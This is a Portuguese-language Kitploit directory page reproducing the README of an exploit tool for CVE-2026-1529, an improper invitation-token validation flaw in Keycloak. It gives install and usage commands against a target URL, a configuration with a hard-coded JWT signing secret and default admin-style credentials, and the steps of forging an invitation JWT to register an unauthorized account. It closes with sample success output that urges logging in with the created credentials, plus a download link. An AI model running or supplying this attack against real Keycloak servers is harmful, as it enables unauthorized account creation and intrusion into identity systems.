Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1529 — Keycloak: Registro não autorizado de organização via validação inadequada do token de convite | Kitploit
Ferramentas/GitHubGitHub/0x240x23elu/cve-2026-1529
Autenticação e AutorizaçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak: Registro não autorizado de organização via validação inadequada do token de convite

Ver Repositório
6217há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Exploração CVE-2026-1529 Keycloak

Python Version License Status

CVE-2026-1529: Keycloak - Registro não autorizado de organização via validação inadequada de token de convite

⚠️ AVISO: Esta ferramenta é apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal.

📋 Índice

  • Visão Geral
  • Recursos
  • Pré-requisitos
  • Instalação
  • Uso
  • Configuração
  • Como Funciona
  • Saída
  • Solução de Problemas
  • Aviso Legal
  • Contribuição
  • Créditos

🎯 Visão Geral

Esta ferramenta demonstra uma vulnerabilidade crítica no Keycloak (CVE-2026-1529) que permite o registro não autorizado de organização através da validação inadequada de tokens de convite JWT. A exploração manipula tokens de convite para obter acesso não autorizado a instâncias do Keycloak.

Detalhes da Vulnerabilidade:

  • ID CVE: CVE-2026-1529
  • Severidade: Crítica
  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Afetados: Instâncias do Keycloak com recurso de convite de organização

✨ Recursos

  • ✅ Detecção automática de vulnerabilidade
  • ✅ Manipulação de tokens JWT
  • ✅ Registro automatizado de usuários
  • ✅ Verificação de login
  • ✅ Relatórios detalhados de exploração
  • ✅ Parâmetros configuráveis
  • ✅ Suporte a registro de depuração
  • ✅ Cliente HTTP com múltiplas tentativas

📦 Pré-requisitos

  • Python 3.7 ou superior
  • pip (gerenciador de pacotes Python)
  • Ambiente virtual (recomendado)
  • Instância do Keycloak alvo (somente testes autorizados)

🚀 Instalação

Método 1: Clonar Repositório

# Clonar o repositório
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# Criar ambiente virtual
python3 -m venv venv
source venv/bin/activate  # No Windows: venv\Scripts\activate

# Instalar dependências
pip install -r requirements.txt

Método 2: Configuração Manual

# Criar estrutura de diretórios
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# Baixar arquivos dos releases ou copiar manualmente
# Depois instalar dependências
pip install requests urllib3 PyJWT

Estrutura de Arquivos

keycloak-exploit/
├── keycloak-exploit.py           # Script principal de exploração
├── requirements.txt              # Dependências Python
├── README.md                     # Este arquivo
├── config/
│   └── default_config.json       # Arquivo de configuração
├── utils/
│   ├── __init__.py              # Inicializador do pacote
│   ├── http_utils.py            # Utilitários de cliente HTTP
│   ├── jwt_utils.py             # Manipulação de JWT
│   └── crypto_utils.py          # Utilitários de criptografia
├── logs/                         # Logs gerados automaticamente
└── output/
    └── reports/                  # Relatórios de exploração

💻 Uso

Uso Básico

python3 keycloak-exploit.py https://target-keycloak.com

Opções Avançadas

# Com token de convite personalizado
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# Com ID de organização personalizado
python3 keycloak-exploit.py -o custom_org_id https://target.com

# Com arquivo de configuração personalizado
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# Ativar registro de depuração
python3 keycloak-exploit.py -d https://target.com

# Mostrar ajuda
python3 keycloak-exploit.py -h

# Mostrar versão
python3 keycloak-exploit.py -v

Argumentos de Linha de Comando

ArgumentoCurtoDescrição
target-URL do Keycloak alvo (obrigatório)
--token-tToken de convite personalizado
--org-id-oID de organização personalizado
--config-cCaminho para o arquivo de configuração
--debug-dAtivar registro de depuração
--version-vMostrar informações de versão
--help-hMostrar mensagem de ajuda

⚙️ Configuração

Edite config/default_config.json para personalizar os parâmetros de exploração:

{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

Opções de Configuração

SeçãoParâmetroDescriçãoPadrão
exploitdefault_usernameNome de usuário para registroadmin_user_2026
exploitdefault_passwordSenha para registroKeycloakCVE2026!
exploitdefault_emailEmail para registro[email protected]
exploittimeoutTempo limite de requisição HTTP (segundos)30
exploitmax_retriesMáximo de tentativas HTTP3
jwtalgorithmAlgoritmo de assinatura JWTHS256
jwtsecret_keyChave secreta JWTPersonalizado
jwttoken_expiryExpiração do token (segundos)3600

🔧 Como Funciona

A exploração funciona nas seguintes etapas:

  1. Verificação de Vulnerabilidade

    • Conecta-se à instância do Keycloak alvo
    • Detecta a versão do Keycloak
    • Testa endpoints de organização
  2. Geração/Manipulação de Token

    • Gera ou aceita token de convite
    • Decodifica token JWT
    • Manipula ID de organização no payload
    • Reassina token com chave conhecida
  3. Registro de Usuário

    • Envia registro com token manipulado
    • Contorna validação de organização
    • Cria conta de usuário não autorizada
  4. Verificação de Login

    • Testa login com as credenciais criadas
    • Gera token de acesso
    • Fornece URL de login
  5. Geração de Relatório

    • Cria relatório detalhado de exploração
    • Salva em output/reports/
    • Inclui todos os detalhes técnicos

Diagrama de Fluxo de Ataque

┌─────────────────┐
│  Verificação    │
│  do Alvo        │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Gerar/Obter   │
│  Token         │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Manipular      │
│ Token          │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Registrar      │
│ Usuário        │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Testar Login   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Gerar Relatório│
└─────────────────┘

📊 Saída

Saída de Exploração Bem-sucedida

============================================================
RESULTADOS DA EXPLORAÇÃO CVE-2026-1529
============================================================
✓ O alvo é vulnerável ao CVE-2026-1529

🎯 EXPLORAÇÃO BEM-SUCEDIDA!
Nome de usuário: admin_user_2026
Senha: KeycloakCVE2026!
Email: [email protected]
Link de Login: https://target.com/realms/master/account

📄 Relatório salvo em: output/reports/exploit_report_20260211_050507.txt

🔐 Use as credenciais fornecidas para acessar a instância do Keycloak!
⚠️  Isso demonstra acesso não autorizado devido ao CVE-2026-1529
Baixar ferramenta